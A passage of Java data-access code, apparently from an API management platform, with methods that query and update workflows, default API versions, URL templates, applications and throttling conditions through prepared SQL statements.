workflowDTO.setExternalWorkflowReference(rs.getString("WF_EXTERNAL_REFERENCE")); workflowDTO.setCreatedTime(rs.getTimestamp("WF_CREATED_TIME").getTime()); workflowDTO.setWorkflowReference(rs.getString("WF_REFERENCE")); workflowDTO.setTenantDomain(rs.getString("TENANT_DOMAIN")); workflowDTO.setTenantId(rs.getInt("TENANT_ID")); workflowDTO.setWorkflowDescription(rs.getString("WF_STATUS_DESC")); } } catch (SQLException e) { handleException("Error while retrieving workflow details for " + workflowReference, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return workflowDTO; } private void setPublishedDefVersion(APIIdentifier apiId, Connection connection, String value) throws APIManagementException { String queryDefaultVersionUpdate = SQLConstants.UPDATE_PUBLISHED_DEFAULT_VERSION_SQL; PreparedStatement prepStmtDefVersionUpdate = null; try { prepStmtDefVersionUpdate = connection.prepareStatement(queryDefaultVersionUpdate); prepStmtDefVersionUpdate.setString(1, value); prepStmtDefVersionUpdate.setString(2, apiId.getApiName()); prepStmtDefVersionUpdate.setString(3, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); prepStmtDefVersionUpdate.execute(); } catch (SQLException e) { handleException("Error while deleting the API default version entry: " + apiId.getApiName() + " from the " + "database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtDefVersionUpdate, null, null); } } /** * Sets/removes default api entry such that api will not represent as default api further. * If the api's version is the same as the published version, then the whole entry will be removed. * Otherwise only the default version attribute is set to null. * * @param apiId * @param connection * @return * @throws APIManagementException */ public void removeAPIFromDefaultVersion(APIIdentifier apiId, Connection connection) throws APIManagementException { String queryDefaultVersionDelete = SQLConstants.REMOVE_API_DEFAULT_VERSION_SQL; PreparedStatement prepStmtDefVersionDelete = null; try { prepStmtDefVersionDelete = connection.prepareStatement(queryDefaultVersionDelete); prepStmtDefVersionDelete.setString(1, apiId.getApiName()); prepStmtDefVersionDelete.setString(2, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); prepStmtDefVersionDelete.execute(); } catch (SQLException e) { handleException("Error while deleting the API default version entry: " + apiId.getApiName() + " from the " + "database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtDefVersionDelete, null, null); } } public String getPublishedDefaultVersion(APIIdentifier apiId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String publishedDefaultVersion = null; String query = SQLConstants.GET_PUBLISHED_DEFAULT_VERSION_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiId.getApiName()); prepStmt.setString(2, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); rs = prepStmt.executeQuery(); while (rs.next()) { publishedDefaultVersion = rs.getString("PUBLISHED_DEFAULT_API_VERSION"); } } catch (SQLException e) { handleException("Error while getting default version for " + apiId.getApiName(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return publishedDefaultVersion; } public void addUpdateAPIAsDefaultVersion(API api, Connection connection) throws APIManagementException { String publishedDefaultVersion = getPublishedDefaultVersion(api.getId()); removeAPIFromDefaultVersion(api.getId(), connection); PreparedStatement prepStmtDefVersionAdd = null; String queryDefaultVersionAdd = SQLConstants.ADD_API_DEFAULT_VERSION_SQL; try { prepStmtDefVersionAdd = connection.prepareStatement(queryDefaultVersionAdd); prepStmtDefVersionAdd.setString(1, api.getId().getApiName()); prepStmtDefVersionAdd.setString(2, APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); prepStmtDefVersionAdd.setString(3, api.getId().getVersion()); String apistatus = api.getStatus(); if (APIConstants.PUBLISHED.equals(apistatus) || APIConstants.DEPRECATED.equals(apistatus) || APIConstants .BLOCKED.equals(apistatus)) { prepStmtDefVersionAdd.setString(4, api.getId().getVersion()); } else { prepStmtDefVersionAdd.setString(4, publishedDefaultVersion); } prepStmtDefVersionAdd.execute(); } catch (SQLException e) { handleException("Error while adding the API default version entry: " + api.getId().getApiName() + " to " + "the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtDefVersionAdd, null, null); } } /** * Adds URI templates define for an API * * @param apiId * @param api * @param connection * @throws APIManagementException */ public void addURLTemplates(int apiId, API api, Connection connection) throws APIManagementException { if (apiId == -1) { //application addition has failed return; } PreparedStatement prepStmt = null; PreparedStatement scopePrepStmt = null; String query = SQLConstants.ADD_URL_MAPPING_SQL; String scopeQuery = SQLConstants.ADD_OAUTH2_RESOURCE_SCOPE_SQL; try { prepStmt = connection.prepareStatement(query); scopePrepStmt = connection.prepareStatement(scopeQuery); Iterator<URITemplate> uriTemplateIterator = api.getUriTemplates().iterator(); URITemplate uriTemplate; for (; uriTemplateIterator.hasNext(); ) { uriTemplate = uriTemplateIterator.next(); prepStmt.setInt(1, apiId); prepStmt.setString(2, uriTemplate.getHTTPVerb()); prepStmt.setString(3, uriTemplate.getAuthType()); prepStmt.setString(4, uriTemplate.getUriTemplate()); //If API policy is available then set it for all the resources. if (StringUtils.isEmpty(api.getApiLevelPolicy())) { prepStmt.setString(5, (StringUtils.isEmpty(uriTemplate.getThrottlingTier())) ? APIConstants.UNLIMITED_TIER : uriTemplate.getThrottlingTier()); } else { prepStmt.setString(5, (StringUtils.isEmpty(api.getApiLevelPolicy())) ? APIConstants.UNLIMITED_TIER : api.getApiLevelPolicy()); } InputStream is; if (uriTemplate.getMediationScript() != null) { is = new ByteArrayInputStream(uriTemplate.getMediationScript().getBytes(Charset.defaultCharset())); } else { is = null; } if (connection.getMetaData().getDriverName().contains("PostgreSQL") || connection.getMetaData() .getDatabaseProductName().contains("DB2")) { if (uriTemplate.getMediationScript() != null) { prepStmt.setBinaryStream(6, is, uriTemplate.getMediationScript().getBytes(Charset.defaultCharset()).length); } else { prepStmt.setBinaryStream(6, is, 0); } } else { prepStmt.setBinaryStream(6, is); } prepStmt.addBatch(); if (uriTemplate.getScope() != null) { scopePrepStmt.setString(1, APIUtil.getResourceKey(api, uriTemplate)); if (uriTemplate.getScope().getId() == 0) { String scopeKey = uriTemplate.getScope().getKey(); Scope scopeByKey = APIUtil.findScopeByKey(api.getScopes(), scopeKey); if (scopeByKey != null) { if (scopeByKey.getId() > 0) { uriTemplate.getScopes().setId(scopeByKey.getId()); } } } scopePrepStmt.setInt(2, uriTemplate.getScope().getId()); scopePrepStmt.setInt(3, APIUtil.getTenantId(APIUtil.replaceEmailDomainBack(api.getId() .getProviderName()))); scopePrepStmt.addBatch(); } } prepStmt.executeBatch(); prepStmt.clearBatch(); scopePrepStmt.executeBatch(); scopePrepStmt.clearBatch(); } catch (SQLException e) { handleException("Error while adding URL template(s) to the database for API : " + api.getId(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, null, null); APIMgtDBUtil.closeAllConnections(scopePrepStmt, null, null); } } /** * Fetches an Application with OAuth Apps, by name. * * @param applicationName Name of the Application * @param userId Name of the User. * @param groupId Group ID * @throws APIManagementException */ public Application getApplicationWithOAuthApps(String applicationName, String userId, String groupId) throws APIManagementException { Application application = getApplicationByName(applicationName, userId, groupId); if (application != null) { Map<String, OAuthApplicationInfo> keyMap = getOAuthApplications(application.getId()); for (Map.Entry<String, OAuthApplicationInfo> entry : keyMap.entrySet()) { application.addOAuthApp(entry.getKey(), entry.getValue()); } } return application; } /** * Checks whether application is accessible to the specified user * * @param applicationID ID of the Application * @param userId Name of the User. * @param groupId Group IDs * @throws APIManagementException */ public boolean isAppAllowed(int applicationID, String userId, String groupId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; try { connection = APIMgtDBUtil.getConnection(); String query = "SELECT APP.APPLICATION_ID FROM AM_SUBSCRIBER SUB, AM_APPLICATION APP"; String whereClause = " WHERE SUB.USER_ID =? AND APP.APPLICATION_ID=? AND " + "SUB.SUBSCRIBER_ID=APP.SUBSCRIBER_ID"; String whereClauseCaseInSensitive = " WHERE LOWER(SUB.USER_ID) =LOWER(?) AND APP.APPLICATION_ID=? AND SUB" + ".SUBSCRIBER_ID=APP.SUBSCRIBER_ID"; String whereClauseWithGroupId = " WHERE (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?)) AND " + "APP.APPLICATION_ID = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; String whereClauseWithMultiGroupId = " WHERE ((APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR SUB.USER_ID = ? " + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?))) " + "AND APP.APPLICATION_ID = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; if (!StringUtils.isEmpty(groupId) && !APIConstants.NULL_GROUPID_LIST.equals(groupId)) { if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(userId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); query += whereClauseWithMultiGroupId; String[] groupIds = groupId.split(","); int parameterIndex = groupIds.length; prepStmt = fillQueryParams(connection, query, groupIds, 1); prepStmt.setString(++parameterIndex, tenantDomain); prepStmt.setString(++parameterIndex, userId); prepStmt.setString(++parameterIndex, tenantDomain + '/' + groupId); prepStmt.setInt(++parameterIndex, applicationID); } else { query += whereClauseWithGroupId; prepStmt = connection.prepareStatement(query); prepStmt.setString(1, groupId); prepStmt.setString(2, userId); prepStmt.setInt(3, applicationID); } } else { if (forceCaseInsensitiveComparisons) { query += whereClauseCaseInSensitive; } else { query += whereClause; } prepStmt = connection.prepareStatement(query); prepStmt.setString(1, userId); prepStmt.setInt(2, applicationID); } rs = prepStmt.executeQuery(); while (rs.next()) { return true; } } catch (SQLException e) { handleException("Error while checking whether the application : " + applicationID + " is accessible " + "to user " + userId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return false; } /** * Fetches an Application by name. * * @param applicationName Name of the Application * @param userId Name of the User. * @param groupId Group ID * @throws APIManagementException */ public Application getApplicationByName(String applicationName, String userId, String groupId) throws APIManagementException { //mysql> select APP.APPLICATION_ID, APP.NAME, APP.SUBSCRIBER_ID,APP.APPLICATION_TIER,APP.CALLBACK_URL,APP // .DESCRIPTION, // APP.APPLICATION_STATUS from AM_SUBSCRIBER as SUB,AM_APPLICATION as APP // where SUB.user_id='admin' AND APP.name='DefaultApplication' AND SUB.SUBSCRIBER_ID=APP.SUBSCRIBER_ID; Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int applicationId = 0; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_NAME_PREFIX; String whereClause = " WHERE SUB.USER_ID =? AND APP.NAME=? AND SUB.SUBSCRIBER_ID=APP.SUBSCRIBER_ID"; String whereClauseCaseInSensitive = " WHERE LOWER(SUB.USER_ID) =LOWER(?) AND APP.NAME=? AND SUB" + "" + ".SUBSCRIBER_ID=APP.SUBSCRIBER_ID"; String whereClauseWithGroupId = " WHERE (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?)) AND " + "APP.NAME = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; String whereClauseWithGroupIdCaseInSensitive = " WHERE (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND LOWER(SUB.USER_ID) = LOWER(?))) AND " + "APP.NAME = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; String whereClauseWithMultiGroupId = " WHERE ((APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR SUB.USER_ID = ? " + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?))) " + "AND APP.NAME = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; String whereClauseWithMultiGroupIdCaseInSensitive = " WHERE ((APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) " + "OR LOWER(SUB.USER_ID) = LOWER(?) " + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?))) " + "AND APP.NAME = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; if (groupId != null && !"null".equals(groupId) && !groupId.isEmpty()) { if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(userId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); if (forceCaseInsensitiveComparisons) { query = query + whereClauseWithMultiGroupIdCaseInSensitive; } else { query = query + whereClauseWithMultiGroupId; } String[] groupIds = groupId.split(","); int parameterIndex = groupIds.length; prepStmt = fillQueryParams(connection, query, groupIds, 1); prepStmt.setString(++parameterIndex, tenantDomain); prepStmt.setString(++parameterIndex, userId); prepStmt.setString(++parameterIndex, tenantDomain + '/' + groupId); prepStmt.setString(++parameterIndex, applicationName); } else { if (forceCaseInsensitiveComparisons) { query = query + whereClauseWithGroupIdCaseInSensitive; } else { query = query + whereClauseWithGroupId; } prepStmt = connection.prepareStatement(query); prepStmt.setString(1, groupId); prepStmt.setString(2, userId); prepStmt.setString(3, applicationName); } } else { if (forceCaseInsensitiveComparisons) { query = query + whereClauseCaseInSensitive; } else { query = query + whereClause; } prepStmt = connection.prepareStatement(query); prepStmt.setString(1, userId); prepStmt.setString(2, applicationName); } rs = prepStmt.executeQuery(); while (rs.next()) { String subscriberId = rs.getString("SUBSCRIBER_ID"); String subscriberName = rs.getString("USER_ID"); Subscriber subscriber = new Subscriber(subscriberName); subscriber.setId(Integer.parseInt(subscriberId)); application = new Application(applicationName, subscriber); application.setOwner(rs.getString("CREATED_BY")); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); applicationId = rs.getInt("APPLICATION_ID"); application.setId(applicationId); application.setTier(rs.getString("APPLICATION_TIER")); application.setUUID(rs.getString("UUID")); application.setGroupId(rs.getString("GROUP_ID")); application.setOwner(rs.getString("CREATED_BY")); application.setTokenType(rs.getString("TOKEN_TYPE")); if (multiGroupAppSharingEnabled) { setGroupIdInApplication(application); } if (application != null) { Map<String, String> applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); } } } catch (SQLException e) { handleException("Error while obtaining details of the Application : " + applicationName, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } private void setGroupIdInApplication(Application application) throws APIManagementException { String applicationGroupId = application.getGroupId(); if (StringUtils.isEmpty(applicationGroupId)) { // No migrated App groupId application.setGroupId(getGroupId(application.getId())); } else { // Migrated data exists where Group ID for this App has been stored in AM_APPLICATION table // in the format 'tenant/groupId', so extract groupId value and store it in the App object String[] split = applicationGroupId.split("/"); if (split.length == 2) { application.setGroupId(split[1]); } else { log.error("Migrated Group ID: " + applicationGroupId + "does not follow the expected format 'tenant/groupId'"); } } } public Application getApplicationById(int applicationId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_ID_SQL; prepStmt = connection.prepareStatement(query); prepStmt.setInt(1, applicationId); rs = prepStmt.executeQuery(); if (rs.next()) { String applicationName = rs.getString("NAME"); String subscriberId = rs.getString("SUBSCRIBER_ID"); String subscriberName = rs.getString("USER_ID"); Subscriber subscriber = new Subscriber(subscriberName); subscriber.setId(Integer.parseInt(subscriberId)); application = new Application(applicationName, subscriber); application.setOwner(rs.getString("CREATED_BY")); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); application.setId(rs.getInt("APPLICATION_ID")); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setTier(rs.getString("APPLICATION_TIER")); application.setTokenType(rs.getString("TOKEN_TYPE")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); Map<String, OAuthApplicationInfo> keyMap = getOAuthApplications(application.getId()); for (Map.Entry<String, OAuthApplicationInfo> entry : keyMap.entrySet()) { application.addOAuthApp(entry.getKey(), entry.getValue()); } if (multiGroupAppSharingEnabled) { if (application.getGroupId() == null || application.getGroupId().isEmpty()) { application.setGroupId(getGroupId(applicationId)); } } } if (application != null) { Map<String,String> applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); } } catch (SQLException e) { handleException("Error while obtaining details of the Application : " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } public Application getApplicationById(int applicationId, String userId, String groupId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_ID_SQL; String whereClause = " AND SUB.USER_ID =?"; String whereClauseCaseInSensitive = " AND LOWER(SUB.USER_ID) =LOWER(?)"; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdCaseInSensitive = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClauseWithMultiGroupId = " AND ((APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR SUB.USER_ID = ? )"; String whereClauseWithMultiGroupIdCaseInSensitive = " AND ((APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR LOWER(SUB.USER_ID) = LOWER(?) )"; if (groupId != null && !"null".equals(groupId) && !groupId.isEmpty()) { if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(userId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); if (forceCaseInsensitiveComparisons) { query = query + whereClauseWithMultiGroupIdCaseInSensitive; } else { query = query + whereClauseWithMultiGroupId; } String[] groupIds = groupId.split(","); int parameterIndex = groupIds.length + 1; //since index 1 is applicationId // query params will fil from 2 prepStmt = fillQueryParams(connection, query, groupIds, 2); prepStmt.setString(++parameterIndex, tenantDomain); prepStmt.setInt(1, applicationId); prepStmt.setString(++parameterIndex, userId); } else { if (forceCaseInsensitiveComparisons) { query = query + whereClauseWithGroupIdCaseInSensitive; } else { query = query + whereClauseWithGroupId; } prepStmt = connection.prepareStatement(query); prepStmt.setInt(1, applicationId); prepStmt.setString(2, groupId); prepStmt.setString(3, userId); } } else { if (forceCaseInsensitiveComparisons) { query = query + whereClauseCaseInSensitive; } else { query = query + whereClause; } prepStmt = connection.prepareStatement(query); prepStmt.setInt(1, applicationId); prepStmt.setString(2, userId); } rs = prepStmt.executeQuery(); if (rs.next()) { String applicationName = rs.getString("NAME"); String subscriberId = rs.getString("SUBSCRIBER_ID"); String subscriberName = rs.getString("USER_ID"); Subscriber subscriber = new Subscriber(subscriberName); subscriber.setId(Integer.parseInt(subscriberId)); application = new Application(applicationName, subscriber); application.setOwner(rs.getString("CREATED_BY")); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); application.setId(rs.getInt("APPLICATION_ID")); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setTier(rs.getString("APPLICATION_TIER")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); Map<String, OAuthApplicationInfo> keyMap = getOAuthApplications(application.getId()); for (Map.Entry<String, OAuthApplicationInfo> entry : keyMap.entrySet()) { application.addOAuthApp(entry.getKey(), entry.getValue()); } if (multiGroupAppSharingEnabled) { if (application.getGroupId() == null || application.getGroupId().isEmpty()) { application.setGroupId(getGroupId(applicationId)); } } } if (application != null) { Map<String,String> applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); } } catch (SQLException e) { handleException("Error while obtaining details of the Application : " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } /** * Retrieves the Application which is corresponding to the given UUID String * * @param uuid UUID of Application * @return * @throws APIManagementException */ public Application getApplicationByUUID(String uuid) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int applicationId = 0; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_UUID_SQL; prepStmt = connection.prepareStatement(query); prepStmt.setString(1, uuid); rs = prepStmt.executeQuery(); if (rs.next()) { String applicationName = rs.getString("NAME"); String subscriberId = rs.getString("SUBSCRIBER_ID"); String subscriberName = rs.getString("USER_ID"); Subscriber subscriber = new Subscriber(subscriberName); subscriber.setId(Integer.parseInt(subscriberId)); application = new Application(applicationName, subscriber); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); applicationId = rs.getInt("APPLICATION_ID"); application.setId(applicationId); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setTier(rs.getString("APPLICATION_TIER")); application.setTokenType(rs.getString("TOKEN_TYPE")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); if (multiGroupAppSharingEnabled) { if (application.getGroupId() == null || application.getGroupId().isEmpty()) { application.setGroupId(getGroupId(application.getId())); } } Timestamp createdTime = rs.getTimestamp("CREATED_TIME"); application.setCreatedTime(createdTime == null ? null : String.valueOf(createdTime.getTime())); try { Timestamp updated_time = rs.getTimestamp("UPDATED_TIME"); application.setLastUpdatedTime( updated_time == null ? null : String.valueOf(updated_time.getTime())); } catch (SQLException e) { // fixing Timestamp issue with default value '0000-00-00 00:00:00'for existing applications created application.setLastUpdatedTime(application.getCreatedTime()); } } // Get custom attributes of application if (application != null) { Map<String, String> applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); } } catch (SQLException e) { handleException("Error while obtaining details of the Application : " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } /** * update URI templates define for an API * * @param api * @throws APIManagementException */ public void updateURLTemplates(API api) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; int apiId; String deleteOldMappingsQuery = SQLConstants.REMOVE_FROM_URI_TEMPLATES_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); apiId = getAPIID(api.getId(), connection); if (apiId == -1) { //application addition has failed return; } prepStmt = connection.prepareStatement(deleteOldMappingsQuery); prepStmt.setInt(1, apiId); prepStmt.execute(); addURLTemplates(apiId, api, connection); connection.commit(); } catch (SQLException e) { handleException("Error while deleting URL template(s) for API : " + api.getId(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * returns all URL templates define for all active(PUBLISHED) APIs. */ public ArrayList<URITemplate> getAllURITemplates(String apiContext, String version) throws APIManagementException { if (APIUtil.isAdvanceThrottlingEnabled()) { return getAllURITemplatesAdvancedThrottle(apiContext, version); } else { return getAllURITemplatesOldThrottle(apiContext, version); } } public ArrayList<URITemplate> getAllURITemplatesOldThrottle(String apiContext, String version) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; ArrayList<URITemplate> uriTemplates = new ArrayList<URITemplate>(); //TODO : FILTER RESULTS ONLY FOR ACTIVE APIs String query = SQLConstants.GET_ALL_URL_TEMPLATES_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiContext); prepStmt.setString(2, version); rs = prepStmt.executeQuery(); URITemplate uriTemplate; while (rs.next()) { uriTemplate = new URITemplate(); String script = null; uriTemplate.setHTTPVerb(rs.getString("HTTP_METHOD")); uriTemplate.setAuthType(rs.getString("AUTH_SCHEME")); uriTemplate.setUriTemplate(rs.getString("URL_PATTERN")); uriTemplate.setThrottlingTier(rs.getString("THROTTLING_TIER")); InputStream mediationScriptBlob = rs.getBinaryStream("MEDIATION_SCRIPT"); if (mediationScriptBlob != null) { script = APIMgtDBUtil.getStringFromInputStream(mediationScriptBlob); } uriTemplate.setMediationScript(script); uriTemplate.getThrottlingConditions().add("_default"); uriTemplates.add(uriTemplate); } } catch (SQLException e) { handleException("Error while fetching all URL Templates", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return uriTemplates; } public ArrayList<URITemplate> getAllURITemplatesAdvancedThrottle(String apiContext, String version) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int tenantId; ArrayList<URITemplate> uriTemplates = new ArrayList<URITemplate>(); String apiTenantDomain = MultitenantUtils.getTenantDomainFromRequestURL(apiContext); if (apiTenantDomain != null) { tenantId = APIUtil.getTenantIdFromTenantDomain(apiTenantDomain); } else { tenantId = MultitenantConstants.SUPER_TENANT_ID; } // TODO : FILTER RESULTS ONLY FOR ACTIVE APIs String query = SQLConstants.ThrottleSQLConstants.GET_CONDITION_GROUPS_FOR_POLICIES_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiContext); prepStmt.setString(2, version); prepStmt.setInt(3, tenantId); rs = prepStmt.executeQuery(); Map<String, Set<ConditionGroupDTO>> mapByHttpVerbURLPatternToId = new HashMap<String, Set<ConditionGroupDTO>>(); while (rs != null && rs.next()) { String httpVerb = rs.getString("HTTP_METHOD"); String authType = rs.getString("AUTH_SCHEME"); String urlPattern = rs.getString("URL_PATTERN"); String policyName = rs.getString("THROTTLING_TIER"); String conditionGroupId = rs.getString("CONDITION_GROUP_ID"); String applicableLevel = rs.getString("APPLICABLE_LEVEL"); String policyConditionGroupId = "_condition_" + conditionGroupId; String key = httpVerb + ":" + urlPattern; if (mapByHttpVerbURLPatternToId.containsKey(key)) { if (StringUtils.isEmpty(conditionGroupId)) { continue; } // Converting ConditionGroup to a lightweight ConditionGroupDTO. ConditionGroupDTO groupDTO = createConditionGroupDTO(Integer.parseInt(conditionGroupId)); groupDTO.setConditionGroupId(policyConditionGroupId); // mapByHttpVerbURLPatternToId.get(key).add(policyConditionGroupId); mapByHttpVerbURLPatternToId.get(key).add(groupDTO); } else { String script = null; URITemplate uriTemplate = new URITemplate(); uriTemplate.setThrottlingTier(policyName); uriTemplate.setAuthType(authType); uriTemplate.setHTTPVerb(httpVerb); uriTemplate.setUriTemplate(urlPattern); uriTemplate.setApplicableLevel(applicableLevel); InputStream mediationScriptBlob = rs.getBinaryStream("MEDIATION_SCRIPT"); if (mediationScriptBlob != null) { script = APIMgtDBUtil.getStringFromInputStream(mediationScriptBlob); } uriTemplate.setMediationScript(script); Set<ConditionGroupDTO> conditionGroupIdSet = new HashSet<ConditionGroupDTO>(); mapByHttpVerbURLPatternToId.put(key, conditionGroupIdSet); uriTemplates.add(uriTemplate); if (StringUtils.isEmpty(conditionGroupId)) { continue; } ConditionGroupDTO groupDTO = createConditionGroupDTO(Integer.parseInt(conditionGroupId)); groupDTO.setConditionGroupId(policyConditionGroupId); conditionGroupIdSet.add(groupDTO); } } for (URITemplate uriTemplate : uriTemplates) { String key = uriTemplate.getHTTPVerb() + ":" + uriTemplate.getUriTemplate(); if (mapByHttpVerbURLPatternToId.containsKey(key)) { if (!mapByHttpVerbURLPatternToId.get(key).isEmpty()) { Set<ConditionGroupDTO> conditionGroupDTOs = mapByHttpVerbURLPatternToId.get(key); ConditionGroupDTO defaultGroup = new ConditionGroupDTO(); defaultGroup.setConditionGroupId(APIConstants.THROTTLE_POLICY_DEFAULT); conditionGroupDTOs.add(defaultGroup); // uriTemplate.getThrottlingConditions().addAll(mapByHttpVerbURLPatternToId.get(key)); uriTemplate.getThrottlingConditions().add(APIConstants.THROTTLE_POLICY_DEFAULT); uriTemplate.setConditionGroups(conditionGroupDTOs.toArray(new ConditionGroupDTO[]{})); } } if (uriTemplate.getThrottlingConditions().isEmpty()) { uriTemplate.getThrottlingConditions().add(APIConstants.THROTTLE_POLICY_DEFAULT); ConditionGroupDTO defaultGroup = new ConditionGroupDTO(); defaultGroup.setConditionGroupId(APIConstants.THROTTLE_POLICY_DEFAULT); uriTemplate.setConditionGroups(new ConditionGroupDTO[]{defaultGroup}); } } } catch (SQLException e) { handleException("Error while fetching all URL Templates", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return uriTemplates; } /** * This method is used to get the API provider by giving API name, API version and tenant domain * * @param apiName API name * @param apiVersion API version * @param tenant tenant domain * @return API provider * @throws APIManagementException if failed to get the API provider by giving API name, API version, tenant domain */ public String getAPIProviderByNameAndVersion(String apiName, String apiVersion, String tenant) throws APIManagementException { if (StringUtils.isBlank(apiName) || StringUtils.isBlank(apiVersion) || StringUtils.isBlank(tenant)) { String msg = "API name, version, tenant cannot be null when fetching provider"; log.error(msg); throw new APIManagementException(msg); } PreparedStatement prepStmt = null; ResultSet rs = null; String apiProvider = null; String getAPIProviderQuery = null; try(Connection connection = APIMgtDBUtil.getConnection()) { if (MultitenantConstants.SUPER_TENANT_DOMAIN_NAME.equalsIgnoreCase(tenant)) { //in this case, the API should be fetched from super 